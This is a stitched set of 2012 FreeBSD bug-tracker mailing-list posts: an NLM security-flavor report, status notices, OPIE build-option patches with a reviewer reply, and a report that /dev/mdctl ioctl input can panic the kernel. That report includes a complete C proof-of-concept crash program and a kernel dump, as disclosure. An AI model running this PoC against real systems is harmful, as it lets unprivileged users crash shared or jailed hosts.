kern/169680: NLM and security flavors
>Number: 169680 >Category: kern >Synopsis: NLM and security flavors >Confidential: no >Severity: serious >Priority: medium >Responsible:freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jul 06 09:50:07 UTC 2012 >Closed-Date: >Last-Modified: >Originator: Andrey Simonenko >Release:FreeBSD 10.0-CURRENT amd64 >Organization: >Environment: >Description: NLM on a client system always uses AUTH_SYS even if a client specified another security flavor in the mount_nfs's "sec" option. NLM on a server system does not verify that NLM client's security flavor is allowed by NFS exported file system, security flavors array from VFS_CHECKEXP() is ignored in nlm/nlm_prot_impl.c:nlm_get_vfs_state(). I added log messages to the kernel to see security flavors used by NFSv3 and NLM requests to verify such behaviour. Both NFS client and server are on the same system, NFSv3 mounts are from unprivileged users. Current implementation of NLM will work only in cases when user credentials on a client system correspond to user credentials on a server system. When a user kinit'ed, then corresponding user's credentials are setup by the server for all NFS RPC requests. When a user opened a file, then is trying to lock it, user's credentials are passed in RPC request (because of AUTH_SYS in NLM) and a server will use them to verify whether a user is allowed to access a file that is being locked. Simple check when local user credentials do not correspond to remote user credentials mapping shows that fcntl(F_SETLK) returns EACCES. According to [1] NLMv4 allows to use different security flavors. [1] http://pubs.opengroup.org/onlinepubs/9629799/chap14.htm >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: ___ freebsd-bugs@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-bugs To unsubscribe, send any mail to "freebsd-bugs-unsubscr...@freebsd.org"
Re: kern/169571: FreeBSD CURRENT r235646 does not see keyboard in laptop FS Amilo D 7830
Synopsis: FreeBSD CURRENT r235646 does not see keyboard in laptop FS Amilo D 7830 State-Changed-From-To: open->patched State-Changed-By: jhb State-Changed-When: Fri Jul 6 12:14:15 UTC 2012 State-Changed-Why: Fix committed to HEAD. Responsible-Changed-From-To: freebsd-bugs->jhb Responsible-Changed-By: jhb Responsible-Changed-When: Fri Jul 6 12:14:15 UTC 2012 Responsible-Changed-Why: Fix committed to HEAD. http://www.freebsd.org/cgi/query-pr.cgi?pr=169571 ___ freebsd-bugs@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-bugs To unsubscribe, send any mail to "freebsd-bugs-unsubscr...@freebsd.org"
misc/169681: Made OPIE support tunable at kernel level
>Number: 169681
>Category: misc
>Synopsis: Made OPIE support tunable at kernel level
>Confidential: no
>Severity: non-critical
>Priority: low
>Responsible:freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Fri Jul 06 13:30:12 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Zak Blacher
>Release:releng_9
>Organization:
Sandvine Corporation
>Environment:
>Description:
re: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1938
Added option to completely remove opie related libraries and executables.
>How-To-Repeat:
>Fix:
Patch attached with submission follows:
Index: usr.bin/telnet/Makefile
===
--- usr.bin/telnet/Makefile (revision 238117)
+++ usr.bin/telnet/Makefile (working copy)
@@ -10,7 +10,7 @@
SRCS= commands.c main.c network.c ring.c sys_bsd.c \
telnet.c terminal.c utilities.c
-CFLAGS+= -DKLUDGELINEMODE -DUSE_TERMIO -DENV_HACK -DOPIE \
+CFLAGS+= -DKLUDGELINEMODE -DUSE_TERMIO -DENV_HACK \
-I${TELNETDIR} -I${TELNETDIR}/libtelnet/
.if ${MK_INET6_SUPPORT} != "no"
@@ -49,4 +49,8 @@
.endif
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+CFLAGS+= -DOPIE
+.endif
+
.include
Index: usr.bin/Makefile
===
--- usr.bin/Makefile(revision 238117)
+++ usr.bin/Makefile(working copy)
@@ -143,7 +143,6 @@
split \
stat \
su \
- systat \
tabs \
tail \
talk \
@@ -341,6 +340,12 @@
SUBDIR+= wtmpcvt
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+_opieinfo= opieinfo
+_opiekey= opiekey
+_opiepasswd= opiepasswd
+.endif
+
.include
SUBDIR:= ${SUBDIR:O}
Index: gnu/usr.bin/Makefile
===
--- gnu/usr.bin/Makefile(revision 238117)
+++ gnu/usr.bin/Makefile(working copy)
@@ -18,7 +18,6 @@
sdiff \
send-pr \
sort \
- ${_texinfo}
.if ${MK_CXX} != "no"
_gperf=gperf
Index: share/mk/bsd.own.mk
===
--- share/mk/bsd.own.mk (revision 238117)
+++ share/mk/bsd.own.mk (working copy)
@@ -373,6 +373,7 @@
NTP \
OPENSSH \
OPENSSL \
+OPIE \
PAM \
PF \
PKGTOOLS \
@@ -570,6 +571,7 @@
KERBEROS \
KVM \
NETGRAPH \
+OPIE \
PAM \
WIRELESS
.if defined(WITH_${var}_SUPPORT) && defined(WITHOUT_${var}_SUPPORT)
Index: share/mk/bsd.libnames.mk
===
--- share/mk/bsd.libnames.mk(revision 238117)
+++ share/mk/bsd.libnames.mk(working copy)
@@ -116,7 +116,7 @@
LIBPAM+= ${LIBRADIUS} ${LIBTACPLUS} ${LIBCRYPT} \
${LIBUTIL} ${LIBOPIE} ${LIBMD}
MINUSLPAM+=-lradius -ltacplus -lcrypt \
- -lutil -lopie -lmd
+ -lutil -lmd
.if ${MK_OPENSSH} != "no"
LIBPAM+= ${LIBSSH} ${LIBCRYPTO} ${LIBCRYPT}
MINUSLPAM+=-lssh -lcrypto -lcrypt
Index: lib/Makefile
===
--- lib/Makefile(revision 238117)
+++ lib/Makefile(working copy)
@@ -86,7 +86,7 @@
${_libmp} \
${_libncp} \
${_libngatm} \
- libopie \
+ ${_libopie} \
libpam \
libpcap \
${_libpmc} \
@@ -230,4 +230,8 @@
_libusb= libusb
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+_libopie= libopie
+.endif
+
.include
Index: lib/libpam/modules/modules.inc
===
--- lib/libpam/modules/modules.inc (revision 238117)
+++ lib/libpam/modules/modules.inc (working copy)
@@ -17,8 +17,10 @@
MODULES+= pam_lastlog
MODULES+= pam_login_access
MODULES+= pam_nologin
+.if ${MK_OPIE_SUPPORT} != "no"
MODULES+= pam_opie
MODULES+= pam_opieaccess
+.endif
MODULES+= pam_passwdqc
MODULES+= pam_permit
MODULES+= pam_radius
Index: etc/Makefile
===
--- etc/Makefile(revision 238117)
+++ etc/Makefile(working copy)
@@ -108,6 +108,9 @@
.if ${MK_SENDMAIL} != "no"
MTREE+=BSD.sendmail.dist
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+MTREE+= BSD.opie.dist
+.endif
.if ${MK_BIND} != "no"
MTREE+=BIND.chroot.dist
.if ${MK_BIND_LIBS} != "no"
@@ -160,7 +163,8 @@
${INSTALL} -o ${BINOWN} -g ${BINGRP} -m 755 \
${BIN2} ${DESTDIR}/etc; \
${INSTALL} -o ${BINOWN} -g ${BINGRP} -m 600 \
- master.passwd nsmb.conf opieaccess ${DESTDIR}/etc;
+ master.passwd nsmb.
misc/169683: System crash via ioctl() on mdctl.
>Number: 169683
>Category: misc
>Synopsis: System crash via ioctl() on mdctl.
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible:freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Filip Palian
>Release:FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012
r...@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
User who has read permission on "/dev/mdctl" is able to crash the system (also
within the jail if only provided by devfs(.rules)) via ioctl() handler in
"/usr/src/sys/dev/md/md.c:1127". The crash occures in function bcopy()
(md.c:491) called in mdstart_preload() (md.c:493). Some detailed information
included below.
-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:
Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address = 0xd550ba7a
fault code = supervisor read, page not present
instruction pointer = 0x20:0xc0d46bfe
stack pointer = 0x28:0xd8e13ca0
frame pointer = 0x28:0xd8e13cbc
code segment= base 0x0, limit 0xf, type 0x1b
= DPL 0, pres 1, def32 1, gran 1
processor eflags= interrupt enabled, resume, IOPL = 0
current process = 3154 (md671657984)
trap number = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13
--
# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy<--- paniced here on $esi (0xd550ba7a)
--
(kgdb) bt
#0 doadump (textdump=1) at pcpu.h:244
#1 0xc0a1845a in kern_reboot (howto=260) at
/usr/src/sys/kern/kern_shutdown.c:442
#2 0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3 0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at
/usr/src/sys/i386/i386/trap.c:975
#4 0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at
/usr/src/sys/i386/i386/trap.c:888
#5 0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6 0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7 0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from user to xmdctlioctl() in ""/usr/src/sys/dev/md/md.c".
To prevent evil users from doing bad things administrators should ensure, that
"/dev/mdctl" permissions are +rw (600) only for root.
For servers where jails are provided for untrusted users (e.g. hosting
companies) access to "/dev/mdctl" device should be forbidden/hidden using
defvs.rules.
Patch attached with submission follows:
#include
#include
#include
#include
#include
#include
#include
#include
#include
int main()
{
int f;
struct md_ioctl s;
struct stat ss;
s.md_version = MDIOVERSION;
//s.md_type = MD_PRELOAD;
s.md_type = MD_MALLOC;
/* this one becomes sc->pl_ptr */
s.md_base = 0x41414141-0x200;
if (stat("/dev/mdctl", &ss) != 0) {
printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
exit (0);
}
f = open("/dev/mdctl", O_RDONLY, 0);
printf("say goodnight...\n");
if (ioctl(f, MDIOCATTACH, &s) < 0)
printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
printf("no +r no fun\n");
exit (0);
}
>Release-Note:
>Audit-Trail:
>Unformatted:
___
freebsd-bugs@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-bugs
To unsubscribe, send any mail to "freebsd-bugs-unsubscr...@freebsd.org"
misc/169686: Made OPIE support tunable at kernel level
>Number: 169686
>Category: misc
>Synopsis: Made OPIE support tunable at kernel level
>Confidential: no
>Severity: non-critical
>Priority: low
>Responsible:freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Fri Jul 06 17:20:02 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Zak Blacher
>Release:releng 8.3
>Organization:
Sandvine Corporation
>Environment:
FreeBSD .sandvine.com 8.1-RELEASE FreeBSD 8.1-RELEASE (GENERIC amd64)
amd64
>Description:
re: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1938
Added option to completely remove opie related libraries and executables.
>How-To-Repeat:
>Fix:
Patch attached with submission follows:
Index: usr.bin/telnet/Makefile
===
--- usr.bin/telnet/Makefile (revision 238165)
+++ usr.bin/telnet/Makefile (working copy)
@@ -10,7 +10,7 @@
SRCS= commands.c main.c network.c ring.c sys_bsd.c \
telnet.c terminal.c utilities.c
-CFLAGS+= -DKLUDGELINEMODE -DUSE_TERMIO -DENV_HACK -DOPIE \
+CFLAGS+= -DKLUDGELINEMODE -DUSE_TERMIO -DENV_HACK \
-I${TELNETDIR} -I${TELNETDIR}/libtelnet/
.if ${MK_INET6_SUPPORT} != "no"
@@ -47,4 +47,8 @@
.endif
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+CFLAGS+= -DOPIE
+.endif
+
.include
Index: usr.bin/Makefile
===
--- usr.bin/Makefile(revision 238165)
+++ usr.bin/Makefile(working copy)
@@ -143,9 +143,9 @@
nohup \
${_nslookup} \
${_nsupdate} \
- opieinfo \
- opiekey \
- opiepasswd \
+ ${_opieinfo} \
+ ${_opiekey} \
+ ${_opiepasswd} \
pagesize \
passwd \
paste \
@@ -178,7 +178,6 @@
split \
stat \
su \
- systat \
tabs \
tail \
talk \
@@ -391,4 +390,10 @@
_smbutil= smbutil
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+_opieinfo= opieinfo
+_opiekey= opiekey
+_opiepasswd= opiepasswd
+.endif
+
.include
Index: share/mk/bsd.own.mk
===
--- share/mk/bsd.own.mk (revision 238165)
+++ share/mk/bsd.own.mk (working copy)
@@ -372,6 +372,7 @@
OBJC \
OPENSSH \
OPENSSL \
+OPIE \
PAM \
PF \
PKGTOOLS \
@@ -521,6 +522,7 @@
KERBEROS \
KVM \
NETGRAPH \
+OPIE \
PAM \
WIRELESS
.if defined(WITH_${var}_SUPPORT) && defined(WITHOUT_${var}_SUPPORT)
Index: share/mk/bsd.libnames.mk
===
--- share/mk/bsd.libnames.mk(revision 238165)
+++ share/mk/bsd.libnames.mk(working copy)
@@ -101,7 +101,11 @@
LIBNGATM?= ${DESTDIR}${LIBDIR}/libngatm.a
LIBNVPAIR?=${DESTDIR}${LIBDIR}/libnvpair.a
LIBOBJC?= ${DESTDIR}${LIBDIR}/libobjc.a
+.if ${MK_OPIE_SUPPORT} != "no"
LIBOPIE?= ${DESTDIR}${LIBDIR}/libopie.a
+LIBPAM+= ${LIBOPIE}
+MINUSLPAM+=-lopie
+.endif
# The static PAM library doesn't know its secondary dependencies,
# so we have to specify them explicitly.
@@ -116,7 +120,7 @@
LIBPAM+= ${LIBRADIUS} ${LIBTACPLUS} ${LIBCRYPT} \
${LIBUTIL} ${LIBOPIE} ${LIBMD}
MINUSLPAM+=-lradius -ltacplus -lcrypt \
- -lutil -lopie -lmd
+ -lutil -lmd
.if ${MK_OPENSSH} != "no"
LIBPAM+= ${LIBSSH} ${LIBCRYPTO} ${LIBCRYPT}
MINUSLPAM+=-lssh -lcrypto -lcrypt
Index: lib/Makefile
===
--- lib/Makefile(revision 238165)
+++ lib/Makefile(working copy)
@@ -82,7 +82,7 @@
${_libmp} \
${_libncp} \
${_libngatm} \
- libopie \
+ ${_libopie} \
libpam \
libpcap \
${_libpmc} \
@@ -202,4 +202,8 @@
_libusb= libusb
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+_libopie= libopie
+.endif
+
.include
Index: lib/libpam/modules/modules.inc
===
--- lib/libpam/modules/modules.inc (revision 238165)
+++ lib/libpam/modules/modules.inc (working copy)
@@ -17,8 +17,10 @@
MODULES+= pam_lastlog
MODULES+= pam_login_access
MODULES+= pam_nologin
+.if ${MK_OPIE_SUPPORT} != "no"
MODULES+= pam_opie
MODULES+= pam_opieaccess
+.endif
MODULES+= pam_passwdqc
MODULES+= pam_permit
MODULES+= pam_radius
Index: etc/Makefile
===
--- etc/Makefile(revision 238165)
+++ etc/Makefile(working copy)
@@ -104,6 +104,9 @@
.if ${MK_SENDMAIL} != "no"
MTREE+=BSD.sendmail.dist
.endif
+.if ${MK_OPIE_SUPPORT} != "no"
+M
Re: misc/169686: Made OPIE support tunable at kernel level
The following reply was made to PR misc/169686; it has been noted by GNATS.
From: Oliver Pinter
To: Zak Blacher
Cc: freebsd-gnats-sub...@freebsd.org
Subject: Re: misc/169686: Made OPIE support tunable at kernel level
Date: Fri, 6 Jul 2012 20:35:47 +0200
On 7/6/12, Zak Blacher wrote:
>
>>Number: 169686
>>Category: misc
>>Synopsis: Made OPIE support tunable at kernel level
>>Confidential: no
>>Severity: non-critical
>>Priority: low
>>Responsible:freebsd-bugs
>>State: open
>>Quarter:
>>Keywords:
>>Date-Required:
>>Class: sw-bug
>>Submitter-Id: current-users
>>Arrival-Date: Fri Jul 06 17:20:02 UTC 2012
>>Closed-Date:
>>Last-Modified:
>>Originator: Zak Blacher
>>Release:releng 8.3
>>Organization:
> Sandvine Corporation
>>Environment:
> FreeBSD .sandvine.com 8.1-RELEASE FreeBSD 8.1-RELEASE (GENERIC
> amd64) amd64
>
>>Description:
> re: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1938
>
> Added option to completely remove opie related libraries and executables.
>>How-To-Repeat:
>
>>Fix:
>
>
> Patch attached with submission follows:
>
> Index: usr.bin/telnet/Makefile
> ===
> --- usr.bin/telnet/Makefile (revision 238165)
> +++ usr.bin/telnet/Makefile (working copy)
> @@ -10,7 +10,7 @@
> SRCS= commands.c main.c network.c ring.c sys_bsd.c \
> telnet.c terminal.c utilities.c
>
> -CFLAGS+=-DKLUDGELINEMODE -DUSE_TERMIO -DENV_HACK -DOPIE \
> +CFLAGS+=-DKLUDGELINEMODE -DUSE_TERMIO -DENV_HACK \
> -I${TELNETDIR} -I${TELNETDIR}/libtelnet/
>
> .if ${MK_INET6_SUPPORT} != "no"
> @@ -47,4 +47,8 @@
> .endif
> .endif
>
> +.if ${MK_OPIE_SUPPORT} != "no"
> +CFLAGS+=-DOPIE
> +.endif
> +
> .include
> Index: usr.bin/Makefile
> ===
> --- usr.bin/Makefile (revision 238165)
> +++ usr.bin/Makefile (working copy)
> @@ -143,9 +143,9 @@
> nohup \
> ${_nslookup} \
> ${_nsupdate} \
> -opieinfo \
> -opiekey \
> -opiepasswd \
> +${_opieinfo} \
> +${_opiekey} \
> +${_opiepasswd} \
> pagesize \
> passwd \
> paste \
> @@ -178,7 +178,6 @@
> split \
> stat \
> su \
> -systat \
systat?
> tabs \
> tail \
> talk \
> @@ -391,4 +390,10 @@
> _smbutil= smbutil
> .endif
>
> +.if ${MK_OPIE_SUPPORT} != "no"
> +_opieinfo= opieinfo
> +_opiekey= opiekey
> +_opiepasswd=opiepasswd
> +.endif
> +
> .include
> Index: share/mk/bsd.own.mk
> ===
> --- share/mk/bsd.own.mk (revision 238165)
> +++ share/mk/bsd.own.mk (working copy)
> @@ -372,6 +372,7 @@
> OBJC \
> OPENSSH \
> OPENSSL \
> +OPIE \
> PAM \
> PF \
> PKGTOOLS \
> @@ -521,6 +522,7 @@
> KERBEROS \
> KVM \
> NETGRAPH \
> +OPIE \
> PAM \
> WIRELESS
> .if defined(WITH_${var}_SUPPORT) && defined(WITHOUT_${var}_SUPPORT)
> Index: share/mk/bsd.libnames.mk
> ===
> --- share/mk/bsd.libnames.mk (revision 238165)
> +++ share/mk/bsd.libnames.mk (working copy)
> @@ -101,7 +101,11 @@
> LIBNGATM?= ${DESTDIR}${LIBDIR}/libngatm.a
> LIBNVPAIR?= ${DESTDIR}${LIBDIR}/libnvpair.a
> LIBOBJC?= ${DESTDIR}${LIBDIR}/libobjc.a
> +.if ${MK_OPIE_SUPPORT} != "no"
> LIBOPIE?= ${DESTDIR}${LIBDIR}/libopie.a
> +LIBPAM+=${LIBOPIE}
> +MINUSLPAM+= -lopie
> +.endif
>
> # The static PAM library doesn't know its secondary dependencies,
> # so we have to specify them explicitly.
> @@ -116,7 +120,7 @@
> LIBPAM+=${LIBRADIUS} ${LIBTACPLUS} ${LIBCRYPT} \
> ${LIBUTIL} ${LIBOPIE} ${LIBMD}
> MINUSLPAM+= -lradius -ltacplus -lcrypt \
> --lutil -lopie -lmd
> +-lutil -lmd
> .if ${MK_OPENSSH} != "no"
> LIBPAM+=${LIBSSH} ${LIBCRYPTO} ${LIBCRYPT}
> MINUSLPAM+= -lssh -lcrypto -lcrypt
> Index: lib/Makefile
> ===
> --- lib/Makefile (revision 238165)
> +++ lib/Makefile (working copy)
> @@ -82,7 +82,7 @@
> ${_libmp} \
> ${_libncp} \
> ${_libngatm} \
> -libopie \
> +${_libopie} \
> libpam \
> libpcap \
> ${_libpmc} \
> @@ -202,4 +202,8 @@
> _libusb=libusb
> .endif
>
> +.if ${MK_OPIE_SUPPORT} != "no"
> +_libopie= libopie
> +.endif
> +
> .include
> Index: lib/libpam/modules/modules.inc
> ===
> --- lib/libpam/modules/modules.inc (revision 238165)
> +++ lib/libpam/modules/modules.inc (working copy)
> @@ -17,8 +17,10 @@
> MODULES += pam_lastlog
> MODULES
Re: kern/169540: [PATCH] Fix clang buildworld: dt_consume.c long long
Synopsis: [PATCH] Fix clang buildworld: dt_consume.c long long State-Changed-From-To: open->patched State-Changed-By: eadler State-Changed-When: Sat Jul 7 00:47:51 UTC 2012 State-Changed-Why: over to committer Responsible-Changed-From-To: freebsd-bugs->dim Responsible-Changed-By: eadler Responsible-Changed-When: Sat Jul 7 00:47:51 UTC 2012 Responsible-Changed-Why: over to committer http://www.freebsd.org/cgi/query-pr.cgi?pr=169540 ___ freebsd-bugs@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-bugs To unsubscribe, send any mail to "freebsd-bugs-unsubscr...@freebsd.org"
